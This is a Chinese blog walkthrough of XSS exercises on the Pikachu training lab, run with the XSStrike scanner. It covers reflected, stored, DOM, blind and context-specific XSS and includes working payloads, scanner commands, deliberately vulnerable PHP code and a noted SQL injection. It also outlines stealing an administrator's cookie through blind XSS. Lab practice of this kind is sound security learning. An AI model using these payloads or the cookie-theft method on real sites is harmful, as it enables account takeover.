目录
反射型XSS(get)
攻击
代码分析
主要步骤
反射型XSS(post)
攻击
代码分析
主要步骤
存储型XSS
攻击
代码分析
主要步骤
DOM型XSS
攻击
代码分析
主要步骤
DOM型XSS-X
代码分析
主要步骤
漏洞原因
XSS之盲打
攻击
代码分析
主要步骤
漏洞原因
XSS之过滤
攻击
代码分析
主要步骤
XSS之HTML特殊字符
攻击
代码分析
主要步骤
XSS之href输出
攻击
代码分析
主要步骤
XSS之js输出
攻击
代码分析
主要步骤
总结
本文使用靶机pikachu,来练习一下工具XSStrike
常用命令
更多内容查看:网络安全-XSStrike中文手册(自学笔记)
可以看到,是get型,页面返回正常
python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit" --skip --skip-dom
试一下第一个payload,利用的是html的details标签
http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=%3CdetAiLs%0doNtoGgle%0a=%0aconfirm()//&submit=submit
$html='';
if(isset($_GET['submit'])){
if(empty($_GET['message'])){
$html.="输入'kobe'试试-_-
";
}else{
if($_GET['message']=='kobe'){
$html.="愿你和{$_GET['message']}一样,永远年轻,永远热血沸腾!
";
}else{
$html.="who is {$_GET['message']},i don't care!
";
}
}
}
登录后输入1,打开Hackbar和F12的控制台,分别获取POST数据和Cookie。
注意,Cookie:之后有一个空格。
python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php" --data "message=1&submit=submit" --headers "Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=slttj3hh1eig65tvj7ldppb984"
使用第2个吧,
v3dm0s
burpsuite拦截,修改post数据
if(!$is_login_id){
header("location:post_login.php");
}
$state = '你已经登陆成功,退出登陆';
$html='';
if(isset($_POST['submit'])){
if(empty($_POST['message'])){
$html.="输入'kobe'试试-_-
";
}else{
//下面直接将前端输入的参数原封不动的输出了,出现xss
if($_POST['message']=='kobe'){
$html.="愿你和{$_POST['message']}一样,永远年轻,永远热血沸腾!
";
}else{
$html.="who is {$_POST['message']},i don't care!
";
}
}
}
if(isset($_GET['logout']) && $_GET['logout'] == '1'){
setcookie('ant[uname]','');
setcookie('ant[pw]','');
header("location:post_login.php");
}
相同的不再赘述。和之前相比,添加了登录,用来设置Cookie,不过仍然是进行拼接,没有任何过滤。
输入1,点击提交,返回正常。
注意,由于保存到数据库,及时按Ctrl+C
python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_stored.php" --data "message=1&submit=submit" --headers "Cookie: csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=slttj3hh1eig65tvj7ldppb984" --skip-dom --skip
XSStrike结果
pikachu页面结果
数据库中message表部分内容:
$html='';
if(array_key_exists("message",$_POST) && $_POST['message']!=null){
$message=escape($link, $_POST['message']);
$query="insert into message(content,time) values('$message',now())";
$result=execute($link, $query);
if(mysqli_affected_rows($link)!=1){
$html.="数据库出现异常,提交失败!
";
}
}
if(array_key_exists('id', $_GET) && is_numeric($_GET['id'])){
//彩蛋:虽然这是个存储型xss的页面,但这里有个delete的sql注入
$query="delete from message where id={$_GET['id']}";
$result=execute($link, $query);
if(mysqli_affected_rows($link)==1){
echo "";
}else{
$html.="删除失败,请重试并检查数据库是否还好!
";
}
}
{$data['content']}删除";
}
echo $html;
?>
把message和时间存储到数据库,直接从数据库中拿出来展示。
输入未过滤,输出未转码,同时,有个彩蛋,删除时存在sql注入漏洞,需要绕过is_numeric的过滤。
跳转到1,说明a链接中包含输入,且url上也存在输入。
先试试和之前的文件上传漏洞合作一把。
../unsafeupload/uploads/tupian.php
点击what do you see?,即可跳转。
接下来就看xss,F12,查看链接
XSStrike
python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_dom.php" --data "message=1&submit=submit" --headers "Cookie: csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=toqllihbqq4jmiudeq49dfttt1" --skip
手工,闭合一下,由于点击可能跳转,使用的onmouseover事件。
' onmouseover = "alert('lady_killer9')"
使用innerHTML在id为dom的 div块中添加a链接,输入的转为字符串放到a链接的href属性上。
输入伤心的往事
上道题使用XSStrike没做出来
出现了一个链接,是get型传参。
点击a链接,又出现了一个,可以看到我们的输入,和上道题就一样了,我估计XSStrike还是做不出来,我就直接手工了。
手工注入
'>
哈哈哈,那个按钮太小了,差点没看见。你可以使用标签,配合onerror等事件。
$html='';
if(isset($_GET['text'])){
$html.= "有些费尽心机想要忘记的事情,后来真的就忘掉了";
}
尝试过滤,但是过滤太简单。通过点击之后再显示输出,可以解决大部分自动化注入脚本,可以自己写脚本,添加锚点即可。
输入
帅呆了
lady_killer9
点击提交
python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xssblind/xss_blind.php" --data "content=帅呆了&name=lady_killer&submit=提交" --headers "Cookie: csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=toqllihbqq4jmiudeq49dfttt1" --skip
点一下提示
原来需要登录
管理员能够看到结果。我们可以通过xss注入,使用js发送邮件或使用websocket将管理员的cookie等发送到我们的服务器,在Cookie失效前使用,获得管理员权限。留言和用户名输入:
登录管理员账号查看:
if(array_key_exists("content",$_POST) && $_POST['content']!=null){
$content=escape($link, $_POST['content']);
$name=escape($link, $_POST['name']);
$time=$time=date('Y-m-d g:i:s');
$query="insert into xssblind(time,content,name) values('$time','$content','$name')";
$result=execute($link, $query);
if(mysqli_affected_rows($link)==1){
$html.="谢谢参与,阁下的看法我们已经收到!
";
}else {
$html.="ooo.提交出现异常,请重新提交
";
}
}
{$data['id']}
{$data['time']}
{$data['content']}
{$data['name']}
删除
A;
echo $html;
}
?>
提交后直接保存到数据库。显示时直接从数据库读取出来拼接后显示。
未对输入进行过滤,输出时直接拼接。
个人认为这个成功的概率太低,真的是盲打,sql盲注时虽然没有具体的回显,但是好歹还知道sql语句是否运行成功,可以通过bool或时间判断。这个直接在管理员界面,你不清楚注入点,也不清楚是否需要闭合。
输入
我用Python
get型传参,有回显。
python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_01.php?message=%E6%88%91%E7%94%A8Python&submit=submit" --skip
我们就用下a链接和prompt吧,稍微修改了一下
$html = '';
if(isset($_GET['submit']) && $_GET['message'] != null){
//这里会使用正则对试一下。
通过下面的内容,可能是单引号加闭合。
代码分析
//这里讲输入动态的生成到了js中,形成xss
//javascript里面是不会对tag和字符实体进行解释的,所以需要进行js转义
//讲这个例子主要是为了让你明白,输出点在js中的xss问题,应该怎么修?
//这里如果进行html的实体编码,虽然可以解决XSS的问题,但是实体编码后的内容,在JS里面不会进行翻译,这样会导致前端的功能无法使用。
//所以在JS的输出点应该使用\对特殊字符进行转义
if(isset($_GET['submit']) && $_GET['message'] !=null){
$jsvar=$_GET['message'];
if($jsvar == 'tmac'){
$html.="
";
}
}
主要步骤
两个输出,id为fromjs的p标签内容和html变量,根据读入的变量message是否为tmac。
我们输入kobe,提交一下,查看生成的js。
可以看到单引号闭合。
'
总结
常见闭合:单引号,双引号,js标签,html标签
XSStrike问题:不显示需要什么字符、标签进行闭合,应该就是按顺序注入的,能够注入成功的话就显示。
更多内容查看:网络安全-自学笔记
喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。